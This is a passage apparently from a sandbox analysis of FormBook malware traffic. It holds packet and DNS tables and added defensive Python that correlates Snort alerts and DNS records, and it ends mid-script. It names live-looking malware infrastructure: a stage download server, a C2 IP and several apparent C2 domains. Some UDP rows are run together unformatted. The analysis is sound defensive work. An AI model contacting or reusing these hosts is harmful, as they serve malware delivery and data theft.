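        sid=int(sid),
        msg=msg,
        sport=int(sport) if sport else None,
        dport=int(dport) if dport else None,
        src=src,
        dst=dst,
    )


# Constructed input: the rows of the Snort table above, one alert per line.
ALERT_LINES = """\
02/24/21-09:54:12.190743 | TCP  | 2018752 | ET TROJAN Generic .bin download from Dotted Quad | 49719 | 80 | 192.168.2.3 | 45.153.203.193
02/24/21-09:54:57.474005 | TCP  | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49726 | 80 | 192.168.2.3 | 104.18.194.20
02/24/21-09:54:57.474005 | TCP  | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49726 | 80 | 192.168.2.3 | 104.18.194.20
02/24/21-09:54:57.474005 | TCP  | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49726 | 80 | 192.168.2.3 | 104.18.194.20
02/24/21-09:55:13.924908 | ICMP | 402     | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.3 | 8.8.8.8
02/24/21-09:55:16.956145 | ICMP | 402     | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.3 | 8.8.8.8
02/24/21-09:55:23.618812 | TCP  | 1201    | ATTACK-RESPONSES 403 Forbidden | 80 | 49739 | 34.102.136.180 | 192.168.2.3
"""

# Assumed rule groupings for this example: ET SIDs meaning "second stage fetched"
# and ET SIDs meaning "stealer talking to its C2".
STAGE_DOWNLOAD_SIDS = {2018752}
CNC_SIDS = {2031412, 2031449, 2031453}
INTERNAL_PREFIX = "192.168."  # assumed lab network


@dataclass(frozen=True)
class LoaderChain:
    host: str             # internal host that did both
    payload_server: str   # where the .bin stage came from
    c2_server: str        # where the check-in went
    delta_seconds: float  # time between the two alerts


def find_loader_chains(alerts: List[Alert],
                       window: timedelta = timedelta(minutes=10)) -> List[LoaderChain]:
    """Pair each stage-download alert with later C2 check-ins from the same internal host
    inside `window`, reporting each C2 address once even when several rules fire on it."""
    chains: List[LoaderChain] = []
    downloads = [a for a in alerts if a.sid in STAGE_DOWNLOAD_SIDS]
    checkins = sorted((a for a in alerts if a.sid in CNC_SIDS), key=lambda a: a.ts)
    for d in downloads:
        seen_c2: Set[str] = set()
        for c in checkins:
            if c.src != d.src or c.ts < d.ts or c.ts - d.ts > window or c.dst in seen_c2:
                continue
            seen_c2.add(c.dst)
            chains.append(LoaderChain(d.src, d.dst, c.dst, (c.ts - d.ts).total_seconds()))
    return chains


def external_contacts(alerts: List[Alert]) -> Set[str]:
    """Every non-internal address in any alert: the raw material for blocking and pivoting."""
    return {ip for a in alerts for ip in (a.src, a.dst) if not ip.startswith(INTERNAL_PREFIX)}


ALERTS = [parse_alert(line) for line in ALERT_LINES.splitlines() if line.strip()]

if __name__ == "__main__":
    for ch in find_loader_chains(ALERTS):
        print(f"{ch.host}: stage from {ch.payload_server}, C2 check-in to {ch.c2_server} "
              f"{ch.delta_seconds:.1f}s later")
    print("external hosts:", sorted(external_contacts(ALERTS)))
```

On this table the correlator reports one chain, 192.168.2.3 fetching its stage from 45.153.203.193 and checking in to 104.18.194.20 45.3 seconds later; the ICMP port-unreachable rows and the 403 from 34.102.136.180 are kept only as external contacts, since nothing on this page ties them to a specific stage.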

Network Port Distribution

TCP Packets

All rows below belong to one connection, 192.168.2.3:49719 to 45.153.203.193:80, which is the .bin stage download flagged by Snort SID 2018752 above.

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 24, 2021 09:54:12.002202034 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.189910889 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.190150023 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.190742970 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.369791985 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.369820118 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.369832993 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.369851112 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.369868040 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.369884968 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.369900942 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.369920015 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.369921923 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.369937897 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.369954109 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.369963884 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.369995117 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.569489002 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569533110 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569545984 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569561005 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569577932 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569593906 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569611073 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569611073 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.569631100 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569648981 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569653034 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.569665909 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569681883 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569698095 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569715023 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569724083 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.569760084 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.569772005 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569796085 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569813967 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.569814920 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569833040 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569873095 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569885015 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.569890022 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569910049 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.569936037 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.569960117 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.767637968 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767668009 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767690897 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767699957 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.767708063 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767724037 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767743111 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767750978 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.767760992 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767777920 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767796993 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767807961 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.767813921 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767829895 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767838955 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.767846107 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767862082 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767865896 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.767882109 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767890930 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.767900944 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767918110 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767927885 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.767935991 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767952919 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767967939 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.767975092 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.767985106 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768002033 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768002033 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.768021107 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768029928 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.768038988 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768054962 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768066883 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.768071890 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768088102 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768102884 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768105984 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.768120050 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768132925 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.768136024 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768156052 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768172979 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.768172979 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768188953 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768204927 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768217087 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.768220901 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768235922 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768250942 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.768251896 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768268108 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3
Feb 24, 2021 09:54:12.768280029 CET | 49719 | 80 | 192.168.2.3 | 45.153.203.193
Feb 24, 2021 09:54:12.768286943 CET | 80 | 49719 | 45.153.203.193 | 192.168.2.3

UDP Packets

Every row is DNS: a query from 192.168.2.3 to 8.8.8.8:53 followed by its response.

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 24, 2021 09:53:38.820416927 CET | 49199 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:38.872474909 CET | 53 | 49199 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:39.689632893 CET | 50620 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:39.738300085 CET | 53 | 50620 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:40.483798981 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:40.535568953 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:41.264951944 CET | 60152 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:41.318134069 CET | 53 | 60152 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:41.931977987 CET | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:41.995696068 CET | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:42.494555950 CET | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:42.546268940 CET | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:43.914186001 CET | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:43.970808983 CET | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:45.091188908 CET | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:45.151494980 CET | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:46.880861044 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:46.929522038 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:48.114321947 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:48.162919044 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:48.996119022 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:49.044739962 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:49.969674110 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:50.018757105 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:50.844532967 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:50.906953096 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:51.634685993 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:51.683485985 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:52.593532085 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:52.642282009 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:54.106189966 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:54.157819033 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:55.101243973 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:55.152909040 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:53:55.930907011 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:53:55.994014025 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:54:18.157432079 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:54:18.207755089 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:54:19.141072035 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:54:19.201199055 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:54:33.919852018 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:54:33.968363047 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:54:57.359049082 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Feb 24, 2021 09:54:57.425810099 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Feb 24, 2021 09:55:02.113053083 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8
                                                              Feb 24, 2021 09:55:02.161890030 CET53543668.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:02.532022953 CET5303453192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:02.630068064 CET53530348.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:07.861970901 CET5776253192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:08.872486115 CET5776253192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:09.888163090 CET5776253192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:10.069408894 CET5543553192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:10.133606911 CET53554358.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:11.904297113 CET5776253192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:12.914405107 CET53577628.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:13.924789906 CET53577628.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:16.956064939 CET53577628.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:17.942914009 CET5071353192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:18.103657961 CET53507138.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:23.378793001 CET5613253192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:23.437237978 CET53561328.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:27.097711086 CET5898753192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:27.178822041 CET53589878.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:28.649949074 CET5657953192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:28.842004061 CET53565798.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:34.560147047 CET6063353192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:34.773560047 CET53606338.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:37.848817110 CET6129253192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:37.897572041 CET53612928.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:40.415353060 CET6361953192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:40.478564978 CET53636198.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:45.191891909 CET6493853192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:45.244132996 CET53649388.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:50.350162983 CET6194653192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:50.483732939 CET53619468.8.8.8192.168.2.3
                                                              Feb 24, 2021 09:55:55.487298965 CET6491053192.168.2.38.8.8.8
                                                              Feb 24, 2021 09:55:55.562167883 CET53649108.8.8.8192.168.2.3

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Feb 24, 2021 09:55:13.924907923 CET | 192.168.2.3 | 8.8.8.8 | cff7 | (Port unreachable) | Destination Unreachable
Feb 24, 2021 09:55:16.956145048 CET | 192.168.2.3 | 8.8.8.8 | cff7 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 24, 2021 09:54:57.359049082 CET | 192.168.2.3 | 8.8.8.8 | 0x4db0 | Standard query (0) | www.hamiltonparkpdx.com | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:02.532022953 CET | 192.168.2.3 | 8.8.8.8 | 0xbf2f | Standard query (0) | www.readingqueens.com | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:07.861970901 CET | 192.168.2.3 | 8.8.8.8 | 0x1738 | Standard query (0) | www.ibluebay3dwd.com | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:08.872486115 CET | 192.168.2.3 | 8.8.8.8 | 0x1738 | Standard query (0) | www.ibluebay3dwd.com | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:09.888163090 CET | 192.168.2.3 | 8.8.8.8 | 0x1738 | Standard query (0) | www.ibluebay3dwd.com | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:11.904297113 CET | 192.168.2.3 | 8.8.8.8 | 0x1738 | Standard query (0) | www.ibluebay3dwd.com | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:17.942914009 CET | 192.168.2.3 | 8.8.8.8 | 0xafa2 | Standard query (0) | www.winningscotland.com | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:23.378793001 CET | 192.168.2.3 | 8.8.8.8 | 0x566 | Standard query (0) | www.kreatelymedia.com | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:28.649949074 CET | 192.168.2.3 | 8.8.8.8 | 0x7775 | Standard query (0) | www.neuroacademyok.com | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:34.560147047 CET | 192.168.2.3 | 8.8.8.8 | 0xd9e5 | Standard query (0) | www.india-vspakistanlive.com | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:45.191891909 CET | 192.168.2.3 | 8.8.8.8 | 0xd0e0 | Standard query (0) | www.bloomingintoyou.com | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:50.350162983 CET | 192.168.2.3 | 8.8.8.8 | 0x6281 | Standard query (0) | www.resp04.online | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:55.487298965 CET | 192.168.2.3 | 8.8.8.8 | 0x3ef6 | Standard query (0) | www.process-activation.net | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 24, 2021 09:54:57.425810099 CET | 8.8.8.8 | 192.168.2.3 | 0x4db0 | No error (0) | www.hamiltonparkpdx.com | www-hamiltonparkpdx-com.rentcafecn.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 24, 2021 09:54:57.425810099 CET | 8.8.8.8 | 192.168.2.3 | 0x4db0 | No error (0) | www-hamiltonparkpdx-com.rentcafecn.com | www.rentcafecloudflaremvccn.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 24, 2021 09:54:57.425810099 CET | 8.8.8.8 | 192.168.2.3 | 0x4db0 | No error (0) | www.rentcafecloudflaremvccn.com | - | 104.18.194.20 | A (IP address) | IN (0x0001)
Feb 24, 2021 09:54:57.425810099 CET | 8.8.8.8 | 192.168.2.3 | 0x4db0 | No error (0) | www.rentcafecloudflaremvccn.com | - | 104.18.193.20 | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:02.630068064 CET | 8.8.8.8 | 192.168.2.3 | 0xbf2f | No error (0) | www.readingqueens.com | ghs.googlehosted.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 24, 2021 09:55:02.630068064 CET | 8.8.8.8 | 192.168.2.3 | 0xbf2f | No error (0) | ghs.googlehosted.com | - | 142.250.185.179 | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:12.914405107 CET | 8.8.8.8 | 192.168.2.3 | 0x1738 | Server failure (2) | www.ibluebay3dwd.com | none | none | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:13.924789906 CET | 8.8.8.8 | 192.168.2.3 | 0x1738 | Server failure (2) | www.ibluebay3dwd.com | none | none | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:16.956064939 CET | 8.8.8.8 | 192.168.2.3 | 0x1738 | Server failure (2) | www.ibluebay3dwd.com | none | none | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:18.103657961 CET | 8.8.8.8 | 192.168.2.3 | 0xafa2 | No error (0) | www.winningscotland.com | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 24, 2021 09:55:18.103657961 CET | 8.8.8.8 | 192.168.2.3 | 0xafa2 | No error (0) | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | - | 3.223.115.185 | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:23.437237978 CET | 8.8.8.8 | 192.168.2.3 | 0x566 | No error (0) | www.kreatelymedia.com | kreatelymedia.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 24, 2021 09:55:23.437237978 CET | 8.8.8.8 | 192.168.2.3 | 0x566 | No error (0) | kreatelymedia.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:28.842004061 CET | 8.8.8.8 | 192.168.2.3 | 0x7775 | No error (0) | www.neuroacademyok.com | neuroacademyok.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 24, 2021 09:55:28.842004061 CET | 8.8.8.8 | 192.168.2.3 | 0x7775 | No error (0) | neuroacademyok.com | - | 23.111.137.154 | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:34.773560047 CET | 8.8.8.8 | 192.168.2.3 | 0xd9e5 | No error (0) | www.india-vspakistanlive.com | - | 23.110.124.43 | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:45.244132996 CET | 8.8.8.8 | 192.168.2.3 | 0xd0e0 | No error (0) | www.bloomingintoyou.com | bloomingintoyou.com | - | CNAME (Canonical name) | IN (0x0001)
Feb 24, 2021 09:55:45.244132996 CET | 8.8.8.8 | 192.168.2.3 | 0xd0e0 | No error (0) | bloomingintoyou.com | - | 192.0.78.25 | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:45.244132996 CET | 8.8.8.8 | 192.168.2.3 | 0xd0e0 | No error (0) | bloomingintoyou.com | - | 192.0.78.24 | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:50.483732939 CET | 8.8.8.8 | 192.168.2.3 | 0x6281 | Server failure (2) | www.resp04.online | none | none | A (IP address) | IN (0x0001)
Feb 24, 2021 09:55:55.562167883 CET | 8.8.8.8 | 192.168.2.3 | 0x3ef6 | No error (0) | www.process-activation.net | - | 109.68.33.25 | A (IP address) | IN (0x0001)
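Two things in the DNS tables above are worth pulling out mechanically rather than by eye: the query for www.ibluebay3dwd.com is retransmitted four times with the same transaction ID 0x1738 and only ever gets SERVFAIL, and the two ICMP port-unreachable messages in the ICMP table coincide with the late SERVFAIL responses on source port 57762, which means the resolver had already given up on that socket when they arrived. The following script is an added example, not part of the Joe Sandbox report: it joins query and answer rows by transaction ID, walks CNAME chains to the final A records, and lists the names that needed retries or never resolved. QUERIES and ANSWERS are transcribed from a subset of the rows above with timestamps shortened; the status labels and the CNAME depth cap are this example's own choices.

```python
"""Join sandbox DNS query/answer rows by transaction ID, walk CNAME chains,
and report retries and failures. Added example, not from the report."""
from collections import defaultdict

# (timestamp, transaction id, queried name), transcribed from the DNS Queries table
QUERIES = [
    ("09:54:57.359", 0x4db0, "www.hamiltonparkpdx.com"),
    ("09:55:07.861", 0x1738, "www.ibluebay3dwd.com"),
    ("09:55:08.872", 0x1738, "www.ibluebay3dwd.com"),
    ("09:55:09.888", 0x1738, "www.ibluebay3dwd.com"),
    ("09:55:11.904", 0x1738, "www.ibluebay3dwd.com"),
    ("09:55:50.350", 0x6281, "www.resp04.online"),
    ("09:55:55.487", 0x3ef6, "www.process-activation.net"),
]

# (timestamp, transaction id, rcode, name, cname, address), transcribed from DNS Answers;
# one response carries several records, and they all share one timestamp
ANSWERS = [
    ("09:54:57.425", 0x4db0, 0, "www.hamiltonparkpdx.com",
     "www-hamiltonparkpdx-com.rentcafecn.com", None),
    ("09:54:57.425", 0x4db0, 0, "www-hamiltonparkpdx-com.rentcafecn.com",
     "www.rentcafecloudflaremvccn.com", None),
    ("09:54:57.425", 0x4db0, 0, "www.rentcafecloudflaremvccn.com", None, "104.18.194.20"),
    ("09:54:57.425", 0x4db0, 0, "www.rentcafecloudflaremvccn.com", None, "104.18.193.20"),
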